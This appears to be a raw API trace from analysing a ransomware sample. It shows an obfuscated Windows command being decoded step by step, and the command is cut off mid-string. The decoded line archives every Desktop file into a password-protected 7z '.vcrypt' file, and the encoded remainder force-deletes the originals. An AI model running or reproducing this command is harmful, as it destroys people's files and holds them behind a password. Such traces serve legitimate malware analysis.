\"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"',#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"')#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') dr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do %(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%THPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mrgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mogb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\modb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_041h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_011h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.e{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exh%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\"#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a 0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z 0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r 0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -m{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 